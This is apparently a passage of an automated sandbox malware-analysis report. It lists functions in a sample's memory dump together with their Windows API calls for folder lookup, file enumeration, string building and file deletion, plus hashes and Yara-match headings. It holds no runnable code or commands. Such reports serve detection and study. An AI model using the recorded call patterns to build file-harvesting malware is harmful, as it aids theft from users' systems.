                                • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: UaA
                              • API String ID: 2104210347-3893042857
                              • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                              • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                              • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                              • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • GetSystemTime.KERNEL32(?,00709C20,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: SystemTimelstrcpy
                              • String ID: cI@$cI@
                              • API String ID: 62757014-1697673767
                              • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                              • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                              • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                              • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                              APIs
                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                              • lstrcatA.KERNEL32(?,00740750), ref: 004150A8
                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                              • String ID: aA
                              • API String ID: 2699682494-2567749500
                              • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                              • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                              • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                              • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022EA094
                              • lstrlen.KERNEL32(00000000), ref: 022EBF06
                                • Part of subcall function 022F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022F90B9
                              • StrStrA.SHLWAPI(00000000,004213E0), ref: 022EBF34
                              • lstrlen.KERNEL32(00000000), ref: 022EC00C
                              • lstrlen.KERNEL32(00000000), ref: 022EC020
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                              • String ID:
                              • API String ID: 1440504306-0
                              • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                              • Instruction ID: ed0e95bb81ccccef142ad951170bc854fc1dcf4b76684e0a1d3483a209fd5269
                              • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                              • Instruction Fuzzy Hash: 2EB11F71920318ABDF58FBE4DD95EEDB33AAF64304F404169E60A62194EF346B48CF61
                              APIs
                              • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                              • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                              • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                              • FindClose.KERNEL32(000000FF), ref: 00413C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$CloseFileNextlstrcat
                              • String ID: !=A
                              • API String ID: 3840410801-2919091325
                              • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                              • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                              • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                              • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                              APIs
                                • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                              • lstrcat.KERNEL32(?,00000000), ref: 022F51E1
                              • lstrcat.KERNEL32(?,00421070), ref: 022F51FE
                              • lstrcat.KERNEL32(?,0064A5F8), ref: 022F5212
                              • lstrcat.KERNEL32(?,00421074), ref: 022F5224
                                • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4B93
                                • Part of subcall function 022F4B77: FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                                • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                                • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                                • Part of subcall function 022F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                                • Part of subcall function 022F4B77: FindClose.KERNEL32(000000FF), ref: 022F4DF9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                              • Instruction ID: 0bdaea05ca655ead524e857089f944e132c0aa86f526c94539ba6166496cc295
                              • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                              • Instruction Fuzzy Hash: 8F21B67AA503087BC754FBE0DC45EE9737AAB55700F404198B64992184DE749AC9CFA2
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID:
                              • API String ID: 1206339513-0
                              • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                              • Instruction ID: cf556d70b8ffc62f258fefb865ef3c014a7be785c1c8317b948dd429a64abe9d
                              • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                              • Instruction Fuzzy Hash: 8401DA79540109FFCB04DFECD998EAE7BBAEF49394F108148F9099B305C635AA40DB95